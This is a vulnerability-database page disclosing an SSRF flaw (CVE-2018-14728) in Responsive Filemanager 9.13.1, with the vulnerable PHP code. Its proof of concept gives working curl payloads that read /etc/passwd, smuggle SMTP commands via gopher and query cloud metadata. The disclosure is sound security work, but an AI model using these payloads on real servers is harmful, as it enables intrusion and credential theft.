Vulners
Lucene search
Responsive Filemanager 9.13.1 Server-Side Request Forgery Vulnerability
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | Responsive FileManager Cross-Site Request Forgery Vulnerability | 7 Aug 201800:00 | – | cnvd |
 | CVE-2018-14728 | 3 Aug 201818:00 | – | cve |
 | CVE-2018-14728 | 3 Aug 201818:00 | – | cvelist |
 | Responsive Filemanager 9.13.1 - Server-Side Request Forgery | 30 Jul 201800:00 | – | exploitdb |
 | Responsive Filemanager 9.13.1 - Server-Side Request Forgery | 30 Jul 201800:00 | – | exploitpack |
 | Responsive filemanager 9.13.1 Server-Side Request Forgery | 8 Jun 202604:09 | – | nuclei |
 | CVE-2018-14728 | 3 Aug 201818:29 | – | nvd |
 | Responsive Filemanager 9.13.1 Server-Side Request Forgery | 29 Jul 201800:00 | – | packetstorm |
 | Server side request forgery (ssrf) | 3 Aug 201818:29 | – | prion |
| Design/Logic Flaw | 7 Mar 202000:15 | – | prion |
10
# Exploit Title: Responsive filemanager - SSRF
# Exploit Author: GUIA BRAHIM FOUAD
# Vendor Homepage: http://responsivefilemanager.com/
# Software Link:
https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.13.1/responsive_filemanager.zip
# Version: 9.13.1
# Tested on: responsive filemanager version: 9.13.1, php version: 7.0
# CVE : CVE-2018-14728
Type
[Security] Bug report - SSRF - Security Issue
PoC
curl 'http://localhost/filemanager/upload.php' --data
'fldr=&url=file:///etc/passwd'
curl 'http://localhost/filemanager/upload.php' --data 'fldr=&url=gopher://
127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%[email protected]%3E%250d%250aRCPT%20TO%3A%[email protected]%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%[email protected]%3E%250d%250aTo%3A%20%[email protected]%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
'
curl 'http://localhost/filemanager/upload.php' --data 'fldr=&url=
http://169.254.169.254/openstack'
...
Description of the problem
Server Side Request Forgery (SSRF) refers to an attack where in an attacker
is able to send a crafted request from a vulnerable web application. SSRF
is usually used to target internal systems behind firewalls that are
normally inaccessible to an attacker from the external network.
Additionally, itas also possible for an attacker to leverage SSRF to access
services from the same server that is listening on the loopback interface
(127.0.0.1).
Typically Server Side Request Forgery (SSRF) occurs when a web application
is making a request, where an attacker has full or partial control of the
request that is being sent. A common example is when an attacker can
control all or part of the URL to which the web application makes a request
to some third-party service
List the steps to reproduce the issue
The GET parameter 'url' is received in line 71 of the file upload.php.
File : upload.php
Line| Code
71 | if(isset($_POST['url'])){
73 | $ch = curl_init($_POST['url']);
77 | curl_exec($ch);
Environment
responsive filemanager version: 9.13.1
php version: 7.0
# 0day.today [2018-07-30] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Jul 2018 00:00Current
0.6Low risk
Vulners AI Score0.6
EPSS0.90732